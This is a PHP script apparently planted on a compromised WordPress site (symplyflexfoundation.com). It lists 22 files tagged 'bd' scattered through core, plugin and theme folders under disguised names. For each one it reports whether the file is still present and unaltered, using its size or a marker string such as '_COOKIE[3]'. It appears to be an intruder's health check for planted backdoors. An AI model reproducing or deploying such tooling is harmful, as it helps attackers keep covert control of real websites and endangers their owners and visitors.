<?php   $r = '/home/edenaunm/symplyflexfoundation.com'; $x = ["/wp-includes/rest-api/fields/class-wp-rest-meta-fields.php"=>"bd@@66889115@@34",
"/wp-includes/formatting.php"=>"bd@@66919125@@buffer_cache",
"/wp-content/plugins/insert-headers-and-footers/includes/lite/conditional-logic/class.wpcode.conditional.woocommerce.php"=>"bd@@66947607@@1613",
"/wp-content/plugins/loginizer/lib/hybridauth/Provider/affiliate_clicks.php"=>"bd@@66970690@@691",
"/wp-content/plugins/loginizer/lib/hybridauth/check_reminders.php"=>"bd@@66921032@@3219",
"/wp-includes/sodium_compat/src/Core32/SecretStream/comment_reply.php"=>"bd@@66891090@@535",
"/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/recipe_topicsnav.php"=>"bd@@66948438@@534",
"/wp-includes/Requests/src/Exception/Http/pluginmgr.php"=>"bd@@66891869@@1490",
"/wp-content/plugins/wp-file-manager/lib/php/editors/DOMLex.php"=>"bd@@66946402@@631",
"/wp-content/plugins/insert-headers-and-footers/includes/admin/pages/class-wpcode-admin-page-file-editor.php"=>"bd@@66919804@@30",
"/wp-includes/sodium_compat/src/Core/Poly1305/magnifier_xml.php"=>"bd@@66891388@@534",
"/wp-content/plugins/loginizer/lib/hybridauth/Exception/settings.php"=>"bd@@66970492@@554",
"/wp-content/plugins/litespeed-cache/tpl/img_optm/network.tpl.php"=>"bd@@66971778@@1471",
"/wp-content/plugins/insert-headers-and-footers/includes/admin/importers/class.wpcode.importer.post.snippets.php"=>"bd@@66948248@@1754",
"/wp-content/themes/twentytwentyfive/patterns/cta-newsletter.php"=>"bd@@66889636@@core_engine",
"/wp-content/plugins/litespeed-cache/tpl/crawler/global.inc.bak.php"=>"bd@@66921905@@595",
"/wp-content/plugins/litespeed-cache/src/cdn/Background.php"=>"bd@@67056053@@535",
"/wp-content/plugins/litespeed-cache/tpl/cdn/order.php"=>"bd@@66921670@@441",
"/wp-includes/SimplePie/library/SimplePie/Decode/HTML/usercp_activate.php"=>"bd@@67055819@@588",
"/wp-content/themes/twentytwentytwo/inc/patterns/header-logo-navigation-offset-tagline.php"=>"bd@@67055071@@_COOKIE[3]",
"/wp-content/plugins/wp-file-manager/lib/php/editors/OnlineConvert/adr_forge.php"=>"bd@@67055329@@536",
"/wp-content/plugins/litespeed-cache/tpl/banner/cloud.php"=>"bd@@66890211@@537"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!'); 